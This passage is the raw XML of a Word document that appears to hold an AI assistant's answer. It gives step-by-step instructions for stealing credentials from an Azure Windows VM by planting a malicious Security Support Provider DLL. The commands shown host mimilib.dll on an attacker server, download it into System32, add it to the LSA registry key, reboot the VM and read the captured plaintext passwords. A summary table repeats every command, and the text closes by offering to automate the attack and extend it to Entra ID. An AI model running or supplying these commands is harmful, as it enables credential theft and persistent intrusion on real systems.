    <w:p w14:paraId="60EF6B10" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>The wget command works if PowerShell is available; otherwise, use Invoke-WebRequest or other download methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEB1FA0" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="0336F641">
          <v:rect id="_x0000_i1056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66291CA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3. Modify the Windows Registry to load the malicious SSP DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523D4993" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Check existing SSP packages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143C5F80" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>shell reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2875D5" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Append mimilib to the Security Packages multi-string value to force Windows to load your DLL during authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3D5F66" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>shell reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages" /t REG_MULTI_SZ /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8178A2" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="6E91DCB9">
          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FDE1FA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4. Restart the Azure Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD308DE" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>To activate the malicious SSP DLL, the VM must be rebooted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D07E657" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>shell shutdown /r /t 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331C9290" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:lastRenderedPageBreak/>
        <w:t>Or from Azure Portal/CLI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2F7AFF" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>az vm restart --resource-group &lt;rg-name&gt; --name &lt;vm-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8E7CED" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="6CCD9F7D">
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="075B665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5. After reboot, retrieve dumped credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5871F411" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>The injected DLL will log captured credentials in clear text to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AD0F90" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>C:\Windows\System32\kiwissp.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583AC38E" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Read the file remotely:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616CF9EC" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>shell type C:\Windows\System32\kiwissp.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBCBCAF" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="276C801D">
          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9F5944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Azure VM Vulnerabilities Exploited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3081C8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Remote command execution or session control</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t>: Initial foothold must allow executing commands or running PowerShell scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EFCE12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Registry permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t>: Ability to modify HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages (requires SYSTEM or admin rights).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C1381E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Persistence via SSP DLL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t>: Windows loads custom SSP modules from registry on boot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4392BDDA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Lack of integrity checks on loaded SSP DLLs</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t>: Allows loading attacker-controlled DLLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8A34B3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User logon events</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t>: Credential dumping happens transparently when users authenticate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2414B56F" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VM restart requirement</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t>: Exploits that the VM will reload SSP providers after reboot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49812749" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="087B9C33">
          <v:rect id="_x0000_i1060" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACCEBB1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Summary Table of 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930"/>
        <w:gridCol w:w="1488"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="691A8618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ACCC7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0EC249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 (PowerShell shell)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D405C1C" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="3D37A78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4473" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Host DLL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B29C1AC" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>python -m SimpleHTTPServer 8000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BF7D1C8" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Serve mimilib.dll to target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="5736884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6632" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Download DLL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11B74D94" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>wget http://&lt;IP&gt;:8000/mimilib.dll -outfile C:\Windows\System32\mimilib.dll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4027F032" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Place DLL on target system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="77B51BF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DF84" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Query SSP registry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48E6BA39" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5682EC6E" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>View current SSP providers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="6F736FE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A58E" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Add mimilib to SSP list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F7F211C" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages" /t REG_MULTI_SZ /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B261800" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Inject attacker DLL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="1F652FF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915D" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Restart VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A0D694A" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>shutdown /r /t 0 or Azure CLI equivalent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F8D00D1" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Activate DLL on boot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="24380261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C8A3" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Read dumped credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4836C7A4" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>type C:\Windows\System32\kiwissp.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7895C1C8" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Extract dumped plaintext credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13C00C4C" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="092404D5">
          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A476E8" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Additional Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45727E12" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">This technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows only</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t>; Linux Azure VMs require other methods (SSH keys, sudo privilege escalation, environment variable leaks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545B3F92" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Requires </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin/system privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> on the target VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA2A55F" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>This method provides persistent credential capture across all user logins after DLL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AF057A" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Can dump </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>local</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AD domain</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">, and indirectly </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microsoft Entra ID</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> account credentials if synced and logged in locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A71FC9B" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:lastRenderedPageBreak/>
        <w:t>Detection: Modifying SSP registry and unexpected DLL loading is highly suspicious; monitor registry changes and file writes to System32.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F46D45" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="45DA0A9D">
          <v:rect id="_x0000_i1062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2910DB4A" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>If you want, I can also help with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B97CF4" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Linux Azure VM pentesting steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FB52AB" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Combining credential dumping with Azure AD / Microsoft Entra ID post-exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089F1C2D" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Automating these steps via PowerShell or Azure CLI scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B08AAB6" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Would you like me to prepare that?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F39A35" w14:textId="77777777" w:rsidR="007B4563" w:rsidRDefault="007B4563"/>
    <w:sectPr w:rsidR="007B456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D4E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C7C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F6B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64C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A35"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="312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7870"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="708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E3828"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0CA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7270"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EDB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2EFC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B3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D04B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="819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A1077"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="98D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71BB9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="663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C7545"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4FB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272F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="77B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557A7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C85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72F1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B8D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E2B79"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D42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E2E20"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6F7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E09C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="259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E2449"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E3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00435"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20B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66ED0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFA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70611"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D12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E057F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA1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97C0F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D0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C21D3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="81D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A4AD7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D04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42AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C5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90753"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C3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C0B26"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B71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C3987"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6904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2D0B57"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7426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33630"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07E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B001E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="389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828C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DD1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D28E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1AB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C5F62"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0CB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266CE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70E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01FDB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="86CA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46026"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA0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7661">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1640333204">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="568730349">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="339476592">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1135945499">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="789740125">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1067145031">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1093670265">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="245304829">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="986713722">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1141267194">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="2090737463">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="265505490">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1778452614">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1504314920">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1976522175">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1620793182">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1673142077">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1279145290">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="786235414">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1046642661">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="696782102">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="471676392">
    <w:abstractNumId w:val="18"/>
  </w:num>
